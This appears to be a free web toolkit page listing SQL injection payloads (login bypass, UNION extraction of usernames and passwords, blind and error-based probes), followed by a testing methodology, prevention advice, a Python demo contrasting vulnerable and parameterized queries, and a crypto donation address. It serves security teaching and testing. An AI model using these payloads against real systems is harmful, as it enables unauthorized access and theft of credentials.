🧠 SQLi Payload Generator
Generate SQL injection payloads for security testing. For educational and authorized testing only!
⚠️ Legal Disclaimer
These payloads are for educational purposes and authorized security testing only.
Using these payloads against systems without explicit permission is illegal.
Always obtain proper authorization before testing for SQL injection vulnerabilities.
📚 Common SQLi Payloads
Basic Injection:
• ' OR 1=1 --
• ' OR 'a'='a
• ') OR 1=1 --
• " OR 1=1 --
• admin'--
• admin'/*
UNION-based:
• ' UNION SELECT 1,2,3 --
• ' UNION SELECT null,username,password FROM users --
• ' UNION SELECT @@version,user(),database() --
Boolean Blind:
• ' AND 1=1 --
• ' AND 1=2 --
• ' AND (SELECT COUNT(*) FROM users)>0 --
Time-based Blind:
• '; WAITFOR DELAY '00:00:05' --
• ' AND SLEEP(5) --
• '; SELECT pg_sleep(5) --
Error-based:
• ' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e)) --
• ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --
🎯 SQLi Testing Guide
Testing Methodology:
1. Identify injection points (forms, URL parameters, headers)
2. Test for SQL errors with special characters
3. Determine the number of columns (UNION-based)
4. Identify database type and version
5. Extract sensitive data (usernames, passwords, etc.)
6. Test for privilege escalation
Common Injection Points:
• Login forms (username/password fields)
• Search functionality
• URL parameters (?id=1)
• HTTP headers (User-Agent, X-Forwarded-For)
• Cookie values
• File upload parameters
Detection Techniques:
• Error messages revealing SQL syntax
• Different responses for true/false conditions
• Time delays in response
• Changes in page content or behavior
Database-Specific Payloads:
• MySQL: SELECT @@version, SLEEP(), BENCHMARK()
• PostgreSQL: SELECT version(), pg_sleep()
• MSSQL: SELECT @@version, WAITFOR DELAY
• Oracle: SELECT banner FROM v$version, DBMS_LOCK.SLEEP()
• SQLite: SELECT sqlite_version()
Prevention:
• Use parameterized queries/prepared statements
• Input validation and sanitization
• Least privilege database access
• Web Application Firewall (WAF)
• Regular security testing
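The first prevention item shown in working code, as an added example that is not part of this toolkit: a login check that concatenates user input into the SQL text, next to the same check using bound parameters, run against a constructed in-memory SQLite table with two of the basic payloads listed above. The table, the credentials and the function names are assumptions made for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (assumption, not from the page): one in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; real systems store a salted hash.
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """String-built query: the user's input becomes part of the SQL statement itself."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: input is bound as data and is never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def demo() -> dict:
    """Return {input: (vulnerable_path_logged_in, safe_path_logged_in)} for each case."""
    conn = make_db()
    results = {}
    # Two of the "Basic Injection" payloads listed on this page, supplied as the username.
    for payload in ["' OR 1=1 --", "admin'--"]:
        results[payload] = (
            login_vulnerable(conn, payload, "wrong-password") is not None,
            login_safe(conn, payload, "wrong-password") is not None,
        )
    # Legitimate credentials must still succeed through the parameterized path.
    results["legit"] = (
        login_vulnerable(conn, "admin", "correct horse battery staple") is not None,
        login_safe(conn, "admin", "correct horse battery staple") is not None,
    )
    return results
```

In the vulnerable path each payload yields a row without the password, which is exactly the "different responses for true/false conditions" signal listed under detection; in the parameterized path the same strings are compared as literal usernames and match nothing.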
💰 Support Development
This toolkit is 100% free. If it helped you, consider donating in USDT to support future development.
USDT (TRC20):
TACpbL6iRczHYzE4sJCKfHB3Npw8NoQv37
